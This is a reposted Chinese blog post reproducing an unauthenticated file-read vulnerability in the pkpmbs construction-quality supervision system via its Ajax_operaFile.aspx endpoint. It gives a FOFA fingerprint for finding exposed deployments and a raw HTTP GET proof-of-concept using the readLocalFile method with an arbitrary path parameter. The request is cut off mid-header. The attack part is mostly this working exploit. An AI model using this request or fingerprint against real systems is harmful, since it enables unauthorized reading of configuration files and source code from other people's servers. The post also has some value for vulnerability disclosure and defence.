pkpmbs 建设工程质量监督系统 Ajax_operaFile.aspx 文件读取漏洞复现

diannao/2024/9/22 2:02:53/文章来源:https://blog.csdn.net/qq_41904294/article/details/138308714

0x01 产品简介

pkpmbs 建设工程质量监督系统是湖南建研信息技术股份有限公司一个与工程质量检测管理系统相结合的，B/S架构的检测信息监管系统。

0x02 漏洞概述

pkpmbs 建设工程质量监督系统 Ajax_operaFile.aspx接口处存在文件读取漏洞，未经身份认证的攻击者可以利用漏洞读取系统内部配置文件或源码，造成信息泄露，导致系统处于极不安全的状态。

0x03 复现环境

FOFA：icon_hash="2001627082"

0x04 漏洞复现

PoC

GET /Applications/BaseInfos/System/Ajax_operaFile.aspx?method=readLocalFile&path=/Applications/BaseInfos/System/Ajax_operaFile.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/diannao/5030.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！